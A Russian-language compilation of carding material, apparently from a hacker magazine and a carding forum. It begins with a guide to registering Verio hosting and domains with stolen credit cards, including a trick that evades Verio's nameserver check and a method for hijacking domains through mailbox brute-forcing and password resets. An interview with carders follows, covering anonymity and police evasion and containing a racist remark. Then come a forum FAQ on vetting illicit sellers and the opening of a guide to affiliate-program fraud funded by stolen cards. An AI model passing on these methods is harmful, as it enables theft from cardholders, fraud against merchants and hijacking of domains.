Когда имя будет определено, наступает второй шаг регистрации - выбор плана хостинга. Тебе будет предложено два варианта - купить зону только для "парковки", либо выбрать специальный план для нее. Щелкай по второму пункту и попадешь на страницу с выбором типа регистрации. Советую выбрать UNIX GOLD PLAN. Пусть он и дорогой (около $100 за месяц), но проблем с переносом зон у тебя точно не будет. Хотя сложностей не будет при любом плане, так как существует один секрет, позволяющий обманывать защиту компании. Когда действия будут подтверждены, у тебя спросят личные данные. Из них ты, конечно же, занесешь только свой e-mail, остальные сведения будут о владельце карты. Кстати, за этим адресом будет закреплен твой личный аккаунт на Verio - при вторичной регистрации домена тебе потребуется лишь ввести свой пароль и/или инфу о новой кредитке.
На предпоследнем шаге кардеру предстоит занести информацию о карте - на этом я не буду останавливаться, так как такие операции ты производишь очень часто.
Ну и, наконец, для завершения сделки, подтверди свою покупку и получи благодарность от Verio. Компания пообещает отправить тебе письмо после проверки кредитной карты. Теперь один нюанс: если ты получаешь два письма с промежутком около 10 минут - все отлично, запрос прошел, и домен забит за тобой (первое письмо содержит запрос о регистрации, второе - правила хостинга). В противном случае - карта невалидна, и придется производить новую сделку.
Через день на твой ящик придет еще одно письмо, на этот раз с данными о твоем домене. Теперь можешь прыгать от радости и ждать, пока обновятся зоны и твой домен будет откликаться на запросы. Поначалу довольствуйся IP-адресом, за которым закреплен личный FTP-доступ и панель управления именем. В довесок к этому будут предоставлены DNS-серверы и правила пользования хостингом.
Прелести Control Panel
Теперь можно проверить работу Control Panel и залогиниться под выданным аккаунтом. Панелька находится по адресу http://ip-address/stats/. Для доступа к ней выдается 6-значный логин, который является частью твоего домена (например, для www.supercard.to логин будет superc). Пароль генерируется из 8 случайно взятых символов.
Когда будешь внутри, не помешает сменить пароль на более удобный (но не менее сложный). Это делается во вкладке Change Password. Теперь самое время заняться раздачей e-mail аккаунтов. Если ты взял себе план выше, чем DNR (Domain Registration Only), то тебе будут предоставлены от десяти аккаунтов по POP3/IMAP, а также доступ к SMTP. Чтобы добавить новую POP3-запись, перейди в соответствующий раздел и задай пользователю логин и пароль. После этого жми Change, и аккаунт успешно добавится в базу.
Иногда приходится добавлять редирект-запись, то есть адрес, с которого пришедшие письма будут автоматически пересылаться на указанный в форме мыльник. С этим ничего сложного, надо лишь чуть выше отметить значение формы, названное "All email not specifically forwarded will be sent to". В случае если аккаунта не существует, все письма будут автоматически пересылаться на этот адрес. Это очень удобно и позволяет полностью контролировать почтовую систему твоего домена.
Для работы с e-mail существует приятная оболочка Webmail. Раньше она входила в любой хостинг-план на халяву, теперь же за нее просят 10 американских президентов ежемесячно (нашли, на чем нажиться). Но стоит сказать, что скрипты Webmail сделаны на ура - в них существует все, что пригодилось бы рядовому пользователю. Ссылка на Webmail - www.supercard.to/webmail/ либо http://webmail.supercard.to/.
Также присутствует интересный раздел "Domain Manager", который находится вверху на панели инструментов. Там можно без проблем зарегистрировать виртуальный домен. Он будет подвязан к главному, а оплата будет производиться по этой же карточке. Таким образом, просто заполни форму регистрации и не заботься об оплате имени - все произойдет автоматически. Кстати, процедура регистрации займет минимальное время, так как необходимо лишь поставить галочку, подтверждающую, что клиент ознакомлен с правилами хостинга, а затем аккуратно заполнить список новых имен и срок регистрации (от года до десяти лет). Если все сделано правильно и домен не занят - тебя попросят подождать денек, пока обновятся зоны. Особых проблем с созданием виртуального домена нет. Кстати, изменить, а тем более перенести зону такого виртуального имени тебе не удастся. Придется довольствоваться разделом Edit Pointers. Там возможна лишь подвязка определенного хоста к IP-адресу (создание домена третьего уровня).
Создание своих доменов
Когда ты получаешь полный доступ к зоне своего домена, то появляется возможность создания своих сабдоменов (уже третьего уровня), а также других весьма полезных полей DNS. Все это можно сделать во вкладке "Zone File Editor", которая находится в первом пункте управления "Manage My Web site".
Заходи туда и увидишь файл, в котором прописаны минимальные поля. В первую очередь, это SOA. Там находятся два e-mail адреса Postmaster'а и Hostmaster'а. Затем следует порядковый номер, время обновления и дата истечения срока зоны. Чуть ниже файла ты увидишь форму для новых записей, которую необходимо заполнить. Существует несколько параметров, разрешенных для добавления. Вот некоторые из них:
A. Нужен для подвязки нового сабдомена к IP-адресу. Например, запись subdomain.supercard.to. IN A 127.0.0.1 будет означать, что имя будет ссылаться на локальный адрес. Кстати, точка в конце сабдомена обязательна - она означает конец записи (в противном случае адрес будет иметь вид subdomain.supercard.to.supercard.to, то есть присоединяться к главному имени).
CNAME. Параметр позволяет создавать алиас для уже существующего имени. К примеру, admin.supercard.to. IN CNAME supercard.to. будет привязывать сабдомен к главному хосту, делая эти записи равнозначными.
MX. Расшифровывается этот параметр как Mail eXchanger. Все SMTP-службы работают со значением опции, предварительно запрашивая его с сервера имен. Это удобно, поскольку делает постоянным хост с работающим на нем smtpd для каждого домена. Пример использования:smtp.supercard.to. IN MX 10 222.222.222.222. Число 10 означает приоритет записи, соответственно, полей MX может быть несколько.
NS. Самая интересная опция, поскольку ее значение - NS-сервер для данного домена. Как я уже говорил, некоторые хостинги позволяют переносить записи с одного сервера на другой. Verio не исключение, но тут существует один нюанс. Дело в том, что если ты выбрал план DNR, изменить NS-сервер тебе не удастся (сценарий выругается на неверный план регистрации). Все было бы плохо, если бы не один трюк, позволяющий обмануть эту защитную систему. В случае, когда адрес NS-сервера содержит подстроку "verio", запрос обработается как надо, а адрес запишется в базу. Реализуется на практике это очень просто: в конфиге к твоему серверу приписывается следующая строка:
verio.cardns.net. IN A 222.222.222.222,
где 222.222.222.222 - IP-адрес сервера. После этого (когда зоны обновятся, а хост будет виден из глобала) можешь смело переносить DNS-сервер. Заполняем форму следующим образом:
supercard.to. IN NS verio.cardns.net.
Verio проглотит такой запрос, и через день зоны перенесутся на твою машину. Естественно, ты должен будешь позаботиться об этом заранее и составить конфиг для своего домена (он может совпадать с тем, что ты редактировал на Control Panel).
Стоит рассказать и об оформлении прямой зоны домена (именно она и будет переноситься на посторонний сервер). Для этого необходимо задать в главном named.conf информацию о местонахождении и значении зоны. Это делается следующим блоком данных:
Здесь имя зоны - любое название (лишь бы ты понял, к чему ведет этот блок), тип - предназначение DNS, master или slave (во втором случае необходимо создать внутренний блок с masters-серверами). И, наконец, allow-query обрабатывает запросы от конкретных адресов (в нашем случае любой может запросить данные о домене). Параметров в блоке zone { } может быть много, каждый из них отвечает за определенную вещь. За подробностями иди в man named.conf.
Теперь можно создавать файл supercard.to.hosts, который, как я уже говорил, не отличается от зоны на verio.net. Ты лишь можешь изменить первый параметр $TTL, который означает период, за который обновляются зоны. К примеру, его значение 1d говорит о том, что каждый день будет происходить синхронизация. Также допустимо указывать время в секундах. После всех модификаций конфигурационного файла bind, необходимо перезапустить демон. Для этого пошли процессу сигнал 1: killall -1 named.
Брешь в безопасности Verio будет на пользу кардеру, так как при выборе плана DNR, он может без проблем перетащить зоны на отдельный сервер и радоваться жизни.
TXT, SRV. Текстовые и служебные записи, которые могут быть внесены для разъяснения какой-либо информации. Так, например, можно уточнить некоторые электронные адреса. На них можно слать почту в определенных случаях (Spam, Abuse и т.п.).
Последнего параметра PTR, организующего обратный резолв (IP-адрес в hostname), ты не обнаружишь. Это обусловлено тем, что вторая зона хранится у Verio и держится в строгом секрете. Ты же вполне можешь обойтись без PTR, создавая свои красивые виртуальные хосты (пусть даже в одну сторону) с использованием опции A.
После такого описания параметров тебе несложно будет разобраться в прописке опций или переносе зон. Кстати, перенести их будет вполне логично, так как при отрицательном балансе на карте, Verio просто заблокирует FTP и WEB-доступ к сайту (останется только Control Panel). Все изменения в зонах будут немедленно отправлены на e-mail (под которым был зарегистрирован домен). Кстати, не забудь подтвердить редактирование. Это будет предложено сделать при нажатии на Submit.
Продление аккаунта и апгрейд плана
Как и любой хостинг, Verio поддерживает продление времени регистрации. Иными словами, когда у тебя заканчивается период, на который ты покупал домен, можно с легкостью его продлить. Возможно, потребуется найти другую кредитную карту. Для этого необходимо выбрать вкладку "Update Method" в разделе Billing твоей панели управления. Далее определить новые сроки и проплатить кредиткой с положительным счетом.
С апгрейдом плана все немного сложнее. Именно поэтому я советовал выбирать его сразу при регистрации. Вот что получилось в моем случае, когда я выбрал Silver Plan и захотел поменять его на Gold. Как выяснилось, для этого нужно было написать письмо администратору Verio с запросом. Затем мне пришел ответ, что моя карта истекла, и теперь мне нужно отправить ему новые данные. Все было выполнено по указанию, но вот ответ администратора меня шокировал. Для того чтобы проапгрейдить план, мне надо было позвонить по телефону в Штаты и подтвердить голосом данные о кредитке. Я забил на это дело и остался с серебряным планом. Думаю, ты бы поступил так же.
Как уже было написано, через два месяца при отрицательном счете Verio отрубит у тебя доступ к FTP и Web. Точнее, сотрет все твои каталоги и файлы, сам же вход будет возможным. Чтобы успеть забэкапить всю важную информацию, просто следи за почтовым ящиком - за три дня до события тебе упадет письмо, в котором будет написано об отключении аккаунта.
Забыли пароль?
Всякое может случиться, и запамятовать пароль на Control Panel может любой человек. Verio имеет автоматическую систему высылки подобной информации.
При логине на Web-админку ты увидишь стандартный запрос пароля от Apache. Если его ввести неверно три раза, сервер переведет тебя на страницу 403. Помимо ругани о неверном пароле, ты найдешь ссылку, ведущую на скрипт высылки забытого пароля. Никакой контрольной фразы и дополнительных данных - просто нажми "Send", и инфа уйдет на твой мыльник (за которым закрепляется домен).
Кстати, тут может возникнуть ряд идей, о хищении домена у владельца. Достаточно намутить простой POP3-брутфорс (либо просто увести мыло, на которое регился домен) и запросить данные на него - все, имя твое! Правда, учитывай, что хозяин запросто может его вернуть, но ничто не мешает тебе выслать пароль во второй раз.
Всем спасибо, все свободны!
Любой хостинг можно описать подобным образом. У каждого есть свои достоинства и недостатки, я это говорю с полной уверенностью, так как был клиентом пяти различных компаний. И этой статьи не было бы, если бы Verio не оправдал все мои ожидания. Конечно, у него есть свои минусы, так как идеального хостинга не существует, но сохранение всех зон и доступа к Control Panel после истечения срока кредитки меня весьма порадовало. Это не оставит равнодушным и тебя, ведь любой кардер не любит таких глобальных проблем, как утеря домена. Я думаю, ты не исключение.
Verio - далеко не единственная компания, предоставляющая услугу регистрации домена второго уровня. Вот краткий список подобных серверов.
www.networksolutions.com - регистрация доменов в зоне .com, .net, .org.
www.register.com - .com, .net, .org, а также .biz и .info.
www.tonic.to - обслуживание доменов в зоне .to.
www.inc.ru - единственный ресурс по оформлению доменов .ru.
Вопросы?
Control panel на Verio.net снабжена множеством ссылок на Help. Например, можно найти помощь по каждому хостинг-плану, FTP-доступу, webmail, виртуальным доменам, зонам и т.д. Кроме того, как утверждают на главной странице, любые вопросы, заданные по мылу, обязательно будут разрешены в короткие сроки.
Работа с DNS
Для проверки работоспособности зон нередко приходится пользоваться утилитой host. Вот полезные опции, которые могут тебя заинтересовать:
host -l hostname - выводит полный список сабдоменов, подвязанных к hostname.
host -t TYPE hostname - выводит значение параметра TYPE, который может иметь значение MX, NS и др. Обо всех опциях было подробно рассказано.
host hostname - выполнить преобразование hostname в IP-адрес.
Интервью с живыми кардерами
Какие-то зашуганные люди эти кардеры. Стучишься к ним в асю, предлагаешь интервью провести, объясняешь, что приватная инфа тебе на фиг не впала, что хочется просто поговорить "за жизнь". Так нет, плотно морозятся. Ведь я, возможно, полковник Мусоров из ФБР, сплю и вижу, как засадить всех на нары.
Короче, нервов мне попортили изрядно. Но мир не без добрых людей. На мое предложение откликнулись двое (настоящие имена и ники, естественно, не публикуются - прим. ред.).
XS: Сколько времени ты уже занимаешься кардингом? Расскажи о том, как и почему ты в это втянулся? Каким было первое дело, которое ты провернул?
dos: Серьезно занимался вещевым кардингом около года, 4 месяца назад бросил. Первой вещью, которую выслали, был простенький цифровой фотик. Радовался тогда, как слон. Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало. Бросил кардинг из-за того, что меня кинули подряд два человека. Кинули на дорогую электронику, которую я заказал, а долю свою не получил. У меня просто опустились руки, не хотелось дальше продолжать. Кардинг на самом деле очень нервное занятие.
XS: Насколько серьезно ты заботишься о своей privacy? Например, меняешь ли ты квартиры в целях конспирации? Доверяешь ли приватную инфу проверенным людям?
dos: Квартиры меняют только параноики. Инфу доверяю. Гораздо важнее не болтать о своем занятии направо и налево всяким друзьям-знакомым.
ВГ: Достаточно понимать, что ты делаешь, и как это может повлиять на твое дальнейшее будущее. Например, это интервью... По-моему, получилось хорошее размышление вслух ни о чем. Для меня не существует проверенных и не проверенных людей. Есть друзья, и есть те, с кем у меня только деловые контакты.
XS: Как, по-твоему, кардинг - это однозначно воровство или увлеченность знаниями об устройстве платежных систем?
dos: Кардинг - такое воровство, которое не имеет явной направленности против человека. Убытки от кардеров терпят банки и интернет-магазины, но не конкретные люди.
ВГ: Термин придумал не я. И тот, кто его придумал, дал конкретное ему объяснение. Кардинг - махинации при помощи кредитных карт и всего, что имеет к ним отношение (именно поэтому всех, кого судили за кардинг, судили по статье за мошенничество, а не за воровство).
XS: Есть ли у тебя легальная работа? Если да, расскажи о ней, если нет - почему не устроишься, и кем бы ты предпочел работать?
dos: Учусь в вузе на первом курсе. В будущем работа будет связана с защитой информации. Вполне возможно, что информацию придется защищать от тех же кардеров.
ВГ: Легальная или наемная? Легальная есть, а наемная (когда работаешь в какой-то компании) была, даже несколько, но... Вообще, я с радостью трудоустроюсь, когда в нашей стране начнут оплачивать труд должным образом, а не по 800-1500 долларов в месяц при 10-часовой занятости. При этом твой начальник ездит каждый день на новых шестисотых и семерках, а его сын, работающий с тобой же, но по 2-часовому дневному графику и 2-3 дня в неделю из пяти, получает 5000 долларов. И то "на мороженое". Предпочел бы работать в какой-нибудь из спецструктур. Например, на букву Ф.
XS: Насколько сложно сейчас быть кардером? Какими знаниями и качествами нужно в первую очередь обладать? Какова специфика современного кардерства, изменилось ли что-то по сравнению с прошлыми годами?
dos: Сейчас кардинг переживает не самые лучшие времена. Знания зависят от направления кардерства. Если это интернет, то надо уметь хорошо организовать защиту и анонимность. Если это реальный кардинг, то очень кстати приемы НЛП и обаяние.
ВГ: Ничего не изменилось. Кардерство всегда было занятием для дебилов. Это не хакерство, где нужны знания в области операционных систем и программирования. В кардерстве не нужно иметь каких-то специализированных знаний. Большинство "нынешних" кардеров - очень тупые люди, не умеющие делать НИЧЕГО, кроме того, чтобы где-то что-то красть.
XS: Какие сейчас самые популярные способы кардерства? Какие считаются самыми профессиональными (требующими высокой квалификации)?
dos: Самого популярного способа не существует, каждый зарабатывает как может. Самыми профессиональными, наверное, являются взломы банковских каналов передачи данных и различных алгоритмов шифрования электронных подписей.
ВГ: Самые популярные, наверное, аукционы. Потому что они требуют минимума знаний. Точнее, вообще их не требуют. Самый профессиональный, скорее всего, пластик. В нем хотя бы надо понимать устройство и алгоритм работы.
XS: Каково, по-твоему, соотношение серьезных кардеров (людей, которые углубленно изучают новые системы денежных платежей и внедряют свои способы обхода защиты) к парням, ищущим легкого хлеба при минимуме затрат времени?
dos: Вокруг кардинга крутится огромное количество народа, но реально что-то делает только один процент из них. Легкого хлеба в кардинге нет в принципе. Может быть, в 1997 можно было что-то поиметь, не утруждая себя изучением темы, но не сейчас.
ВГ: Матерых сейчас очень мало. 70%, если не больше - шушера, которая тупо делает copy/paste информации из какого-нибудь текстовика paypal.txt в веб-браузер. Да, они, возможно, знают все настройки и возможности аккаунтов в этой платежной системе, но лично я не считаю это серьезными познаниями из области кардинга, так как все это знают большинство юзеров, пользующихся системой легально.
XS: Как ты думаешь, имеет ли кардинг "наркотический эффект"? Возникает ли привыкание к легким деньгам, и насколько оно серьезно?
dos: Что-то такое есть. Как-то я с температурой 40 не мог отойти от компа, потому что очень хорошо кардилось.
ВГ: Имеет эффект осознания того, в какой жопе мы живем в нашей стране и насколько абсурдна и ничтожна тут жизнь. Хотя у каждого по-разному. Тут, опять же, все зависит от самого человека. Для кого-то это не более чем игра, цель которой - сделать гадость другому.
XS: Насколько активно правоохранительные органы борются сейчас с кардерами? Насколько успешно у них это получается? Какие организации занимаются проблемами кардерства? Из-за чего обычно попадаются кардеры?
dos: Борются, причем очень даже неплохо. Занимается этим ФСБ совместно с банками. Примерно раз в полгода устраивают облавы. Попадаются кардеры из-за своей неосторожности, а также из-за подстав.
ВГ: По-моему, активности с их стороны вообще нет. Там ведь тоже не идиоты работают. Понимают, что им нет смысла тратить свои силы, время и деньги на то, чтобы "спасать" граждан США (или любой другой страны). Делать ту работу, которой должна заниматься забугорная полиция. Хотя с отморозками, которые пытаются кидать здесь (на территории России) - с ними борются. Но таких, по-моему, очень мало. С ними в основном разбирается внутренняя служба безопасности конкретного банка.
XS: Были ли проблемы с ментами лично у тебя? Если да - расскажи, как попался и из-за чего. Чем все кончилось?
dos: У меня проблем не было. Но был случай, когда я весь вечер кардил, а потом заметил, что работаю без прокси-сервера. То есть меня потенциально могли без проблем выследить. Потом неделю ходил по улицам, оглядываясь. Все казалось, что за мной следят.
ВГ: У меня? Проблемы? О чем ты? Я законопослушный гражданин и честно плачу налоги.
XS: Какие основные правила должен знать каждый кардер (если не хочет, чтобы его прижучили)?
dos: Надо соблюдать анонимность. Работать с людьми, которым доверяешь. И не болтать много о том, какой ты крутой кардер.
ВГ: Те же, что и у хакера: не светить свой IP, не светить свои данные. Проще говоря, делать так, чтобы улик твоей причастности к какому-либо делу было как можно меньше. Или вообще не было.
XS: Существуют ли в России профессиональные команды, которые имеют ежемесячный оборот средств от кардинга в сотни тысяч или даже миллионы долларов?
dos: Существуют. Называть их, естественно, не буду. Такие команды принято называть семьями. Но чисто российскими их нельзя назвать, так как они рассредоточены по всему миру.
ВГ: Смотрите новости по ти-ви, там про них в последнее время что-то часто стали рассказывать.
XS: Возможно ли сейчас обуть с помощью кардерства за раз на гигантскую сумму? Скажем, на десять миллионов баксов? Как это возможно в общих чертах?
dos: Можно, но очень-очень трудно. Можно, например, проникнуть в банковскую сеть так, чтобы никто не заметил, и с нескольких счетов перевести бабки на свой. Потом надо снять бабки со счета, пока банк ничего не просек, и убираться на какой-нибудь остров в Тихом океане.
ВГ: Несмотря на то, что определение кардерства по-прежнему "махинации с кредитными картами", на самом деле сейчас это уже более обширная тема. В нее влились такие направления, как махинации со счетами в разных платежных системах (PAYPAL, например). В силу развития интернет-технологий и электронных платежей, "обуть" можно и на 100 миллионов, но тогда это уже будет не кардерство, а хакерство. Или как это официально называется в США - identity theft. Ты берешь чужой логин и пароль от доступа через интернет к его банковскому счету, и, если там лежат 100 миллионов, переводишь их на свой счет. Что касается кредиток... как я уже сказал ранее, смотрите телевизор. Там рассказывается и о методах, и о суммах, которые имеются с этих методов.
XS: Расскажи, какие сейчас самые навороченные способы защиты, применяемые в кредитных картах? И в общих чертах способы их обхода, применяемые кардерами.
dos: Да, как таковых, новых способов нет. Вот виза, например, недавно взяла и резко сократила процент непроверенных транзакций, из-за этого многие биллинги закрылись, и кардеры потеряли еще одну возможность зарабатывать.
ВГ: Принцип работы всех кредитных карт одинаков. И применительно к сети нельзя говорить о способах защиты самих карт. Тут они не играют уже никакой роли. Другое дело - способы защиты передачи и хранения информации с этих карт в интернете. А эти способы, как показывает практика, полная херня... Так как сейчас 80% (или даже 90%) всех кардерских дел осуществляется через интернет, то все вертится вокруг кражи информации из интернета. И тут все как обычно...
XS: Отличается ли чем-то кардинг в России от кардинга в других странах? Например, в Америке? Может, есть какая-то своя специфика.
dos: Каждый американец с рождения трясется за свою кредитную историю, в которую заносятся все крупные покупки и т.п. Если человек будет замешан в чем-то плохом, это сразу же отразится на его кредитной истории. И потом ему не дадут кредит, не примут на работу. Поэтому большинство американских кардеров являются эмигрантами из СНГ.
ВГ: Ага, отличается. Там преобладают негры.
XS: Существует ли кардерская "сцена" как таковая? Есть ли в carders community свои звезды, легендарные личности? Насколько развито и велико сообщество кардеров?
dos: Конечно, есть. Называть имена не буду. Трудно оценить все сообщество кардеров. В России, думаю, несколько тысяч человек.
ВГ: Про это в вашем журнале уже рассказывал один мальчик год или два назад.
XS: Какие сайты/IRC-каналы являются центровыми для кардеров? Где собираются действительно знающие люди? Какие самые, на твой взгляд, достойные сетевые ресурсы по теме кардерства?
dos: www.carderplanet.com.
ВГ: Достойные люди не собираются на сайтах или тематических кардерских каналах. Кардерпленет.ком - про него уже писали. Те, кто интересуется кардингом, могут обращаться туда.
XS: Какие страны в мире (и в СНГ) являются лидерами по кардерской активности? Существует ли какая-то зависимость, например, от общего уровня жизни?
dos: В мире: Россия, Америка. В СНГ: Россия, Украина. Зависимости не существует из-за того, что все деньги, которые получают кардеры, распределяются в пределах небольшой группы.
ВГ: В мире - Индонезия, а также страны бывшего соцлагеря. В СНГ - Украина, Россия, Прибалтика.
XS: Каким ты видишь кардерство через десять лет? Куда все, по-твоему, идет?
dos: Через десять лет, имхо, исчезнут, наконец, кредитные карты. Но, несомненно, будут люди, которые будут заниматься электронными махинациями с денежными потоками. В том виде, в котором кардинг существует сейчас, все движется к закату кардинга.
ВГ: С развитием беспроводных технологий и базирующихся на этом технологий оплаты товара, а также технологий "физической" оплаты картами через интернет (когда, чтобы сделать оплату на сайте, ты должен вставить свою или чужую карту в кардридер, подключенный к компьютеру, и ввести несколько пин-кодов), кардинг превратится в нечто среднее между фрикингом и хакерством. Придется красть информацию, а потом применять ее путем эмуляции через какое-то устройство.
XS: Что бы ты посоветовал парням, которые не знают, что такое кардинг и как это вообще, но хотят легких денег, хотят стать кардерами?
dos: Главное - не надеяться, что деньги сразу потекут рекой. Кардинг - очень трудное занятие. Для начала надо просто начать тусоваться на кардерских форумах, вникать в тему, задавать вопросы. Через некоторое время, возможно, подвернется какая-нибудь работа. Или ты сам поймешь, что твоих знаний уже достаточно для занятия кардингом. Важно понять, что никакой добрый дядя не станет объяснять, что и как делается - до всего придется в основном доходить самостоятельно.
ВГ: Легкие деньги бывают редко. Поэтому, если хочешь хорошей и человеческой жизни, учись, получай качественные профессиональные знания и уезжай отсюда на@^#! Вообще я не собирался становиться кардером, просто знал, что есть такие люди. Но как-то друг навел на один из кардерских форумов. Сначала почитал из любопытства, потом решил попробовать. Купил на свои деньги информацию о нескольких кредитных картах, и пошло-поехало.
В данном FAQ приведены несложные рекомендации, которые помогут вам при покупке товаров или заказе услуг выбрать надежного продавца и не стать жертвой мошенников. Обращаю внимание, что это рекомендуемые, а не критические требования и не все, кто им не соответствуют, непременно мошенники.
1. Положительные отзывы. Хорошие продавцы обычно имеют много рекомендаций довольных клиентов. Начинайте именно с проверки отзывов на ресурсе, обычно они публикуются в теме с предложением. Отзывы можно подделать, потому обращайте внимание на то, сколько времени прошло с момента регистрации "довольного клиента" до момента написания им отзыва в топике, а также, сколько всего сообщений оставил пользователь, кроме написанного отзыва. Дорогого стоят отзывы старых и авторитетных участников. Возможно, продавец опубликовал на проекте несколько предложений, и в каждом из них вы найдете отзывы о работе с ним.
2. Отсутствие жалоб в разделе Арбитраж проекта. Все жалобы от клиентов (и не только) обычно публикуются и рассматриваются администрацией в разделе Арбитраж проекта, не забывайте заглянуть туда при оценке надежности продавца.
3. Наличие успешных сделок через ГАРАНТ-сервис. После проведения успешной сделки, представитель ГАРАНТ-сервиса всегда информирует об этом других участниках в теме продавца. Писать от имени ГАРАНТ-сервиса могут только Супер-модераторы и Администраторы проекта. Отзыв от ГАРАНТ-сервиса надежнее любых отзывов пользователей.
4. Статус ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Статус участника на форуме должен быть максимально высоким, на нашем форуме администрация рекомендует работать только с участниками со статусом ПРОВЕРЕННЫЙ ПРОДАВЕЦ. Данные участники выделяются зеленым цветом, они проходят проверку администрации на качество товара/услуг. Мы проверяем наличие профилей на других ресурсах, наличие негативной и положительной информации в поисковиках, и информируем об этом других участников ресурса.
5. Оплаченная реклама. Посмотрите, есть ли у продавца платная реклама. Обычно мошенникам это не требуется, у них иная задача, раскидать предложения по интернету, найти жертву и обмануть. С другой стороны, надежные и честные селлеры, которые хотят постоянно продавать свой товар на площадке, в большинстве случаев, покупают рекламные места. (!) Оплаченная реклама еще не означает, что это ПРОВЕРЕННЫЙ ПРОДАВЕЦ, заказать рекламу можно и без прохождения проверки.
6. Работа через ГАРАНТ-сервис. Вы всегда можете проводить сделки через ГАРАНТ-сервисов сторонних форумов. ГАРАНТ-сервис – это надежная защита от мошенников, но только, если вы не забываете про остальные 9 пунктов данного FAQ.
7. Не гонитесь за дешевизной. Уважающие свою работу продавцы имеют достаточно клиентов и хорошо знают рынок, потому никогда не станут продавать свои товары/услуги за копейки. Дешевая цена – инструмент мошенников, а ваша жадность может привести к бедности.
8. Также не забывайте что темы проверенных продавцов помещаются в раздел Проверенные селлеры
Удачных Вам покупок.
Как делали бизнес новички кардинга
В этой статье будет описан один из немногих способов кардинга, интересный для новичков в этом деле. Сразу предупрежу, что все нижесказанное не следует применять на практике, т.к. это противозаконно и может повлечь наказание по статьям 272, 273 УК РФ, а также рассматриваться как мошенничество. Автор статьи никогда не использовал эти материалы на практике. Статья написана исключительно в образовательных целях.
Давай вкратце рассмотрим основную идею этого метода. В интернете есть множество организаций, которые делают в Сети бизнес. Очень часто можно встретить сайты, на которых предлагаются услуги хостинга, аренды серверов, продаются темплейты и скрипты для веб-мастеров. Эти компании различным образом рекламируют свои услуги, и одним из методов рекламы являются партнерские программы. Они могут быть разными, но в большинстве случаев тебе предлагают рекламировать на своем сайте товар или услугу, обычно посредством баннера. За каждого клиента, пришедшего по ссылке с твоего сайта и купившего этот товар, ты получаешь процент или некоторое фиксированное вознаграждение. Поскольку такие услуги или товары обычно являются виртуальными, то компания предлагает удобные способы их оплаты, такие, как электронные платежные системы, и, конечно, кредитные карты. В общем, если у тебя есть раскрученный веб-проект с большой посещаемостью, ты можешь работать по партнерской программе вполне легально.
А теперь подумай, что произойдет, если кто-нибудь сделает сайт, создаст видимость его нужности и посещаемости и разместит на нем баннеры партнерской программы. Допустим, его партнером будет компания, предоставляющая услуги хостинга. Далее - он сам выступает в роли покупателя: заходит на свой сайт, кликает по баннеру и попадает на страницу партнера. Выбирает интересующий его тарифный план и покупает хостинг. Только вот покупать он его будет не на свои деньги, а на чужую кредитную карту. В итоге все довольны: партнер приобрел клиента, а кардер получил процент от сделки. Как получить этот процент и превратить его из виртуальных денег в реальные и будет подробно описано ниже.
Итак, для начала необходимо:
Предполагаемая прибыль: от $500 в месяц и выше.
Подбираем партнера
Для начала нам надо подобрать партнера, чьи услуги или товары придется рекламировать. Искать партнера среди наших компаний и компаний на территории бывшего СССР бесполезно. Во-первых, потому, что это нарушает неписаные законы кардеров, во-вторых - потому, что нехорошо обманывать своих. Тем более что за бугром подобных компаний намного больше, да и платят они очень приличные деньги. Найти партнера несложно, для этого надо зайти в гугл (www.google.com) и набрать в строке поиска: «affiliates program» (партнерская программа). По запросу гугл выведет огромное количество компаний, предлагающих различные товары и услуги и приглашающих тебя стать их партнерами. Не стоит кидаться на первый попавшийся сайт, сначала лучше пройтись по разным компаниям и изучить их условия. Лучше всего, конечно, найти партнера, который будет выплачивать заработанное с помощью WebMoney или на E-Gold. Компании же, предлагающие такие способы выплат, как paypal или наличные, следует отметать сразу.
Далее нас будут интересовать способы оплаты, которыми клиенты могут заплатить за их услуги. Естественно, нам нужен способ оплаты по кредитной карте. Теперь надо обратить особое внимание на то, что именно предлагает будущий партнер. Товар должен быть виртуальным. Книги, футболки, а тем более ноутбуки не подходят. На мой взгляд, лучше всего рекламировать хостинг и темплейты. Ну а самый сладкий кусочек - услуга dedicated servers (аренда сервера). Стоит это удовольствие недешево, поэтому и проценты кардер получит немаленькие.
Теперь следует проверить, насколько легко скардить данный товар или услугу. Попробуй сначала сам, и если все пройдет нормально, то эта компания нам подходит. Да, пока не забыл – обрати внимание на то, как часто можно получать свои деньги. Я думаю, не стоит работать с компанией, которая выплачивает проценты раз в полгода. К счастью, таких маньяков почти нет.
Кроме того, есть такое понятие, как «первоначальный холд» - это время, в течение которого твои первые деньги замораживаются. Мне кажется, что оптимальным выбором будет компания, выплачивающая деньги раз в неделю и имеющая первоначальный холд 2 недели. Но это большая редкость, обычно выплаты производят раз в месяц.
Итак, подведем краткие итоги. Партнер должен:
Делаем сайт а-ля «Рога и Копыта»
Ну что ж, партнера ты нашел, теперь нужен сайт, который будет его рекламировать. Для начала следует определиться с хостингом и доменным именем. Хостинг и домен точно не должны быть нашими. Западные компании как огня боятся людей из СНГ, думая, что все мы - мошенники.
Все это добро можно, разумеется, скардить, но хостинг лучше купить. Обойдется он не очень дорого, бери самый дешевый тарифный план, т.к. базы данных и всякие примочки, типа ssh доступа, тебе вряд ли понадобятся. Домен можно и скардить, но и купить тоже можно, поскольку стоит он недорого. Будет очень обидно, если после месяца работы у тебя все это отберут, и ты не успеешь даже окупить потраченные деньги. Домен лучше зарегистрировать в зоне .com, .net, .org.
Теперь придется поработать веб-мастером. Твой сайт должен иметь идею. Это не должна быть страничка Васи Пупкина. Можно, например, сделать развлекательный сайт, онлайн-журнал обзора новинок железа-софта или то, что тебе ближе всего. Учти, что почти все западные компании откажутся с тобой работать, если на твоем сайте будет порнография, призывы к расизму, пропаганда оружия или наркотиков. Тема должна быть привычная, не вызывающая подозрений и лишних вопросов.
Дизайн сайта должен быть добротным. Совсем не стоит делать летающие звезды или прыгающих зайцев, то есть - всего того, что в народе называют попсой. Выбери спокойные цвета, привычный дизайн. Твой партнер обязательно захочет взглянуть на проект, и он никоим образом не должен вызывать подозрений. Можно пойти и более хитрым путем, например, сделать сайт на китайском языке, чтобы партнеры ничего не поняли. Делается это легко: достаточно зайти на любой китайский сайт, скопировать оттуда много иероглифов, и, поменяв их местами, вставить в свой сайт. Это очень удобное решение, поскольку вопросов будет меньше, да и партнер будет рад - ведь китайцев целый миллиард, и это очень большой рынок будущей клиентуры.
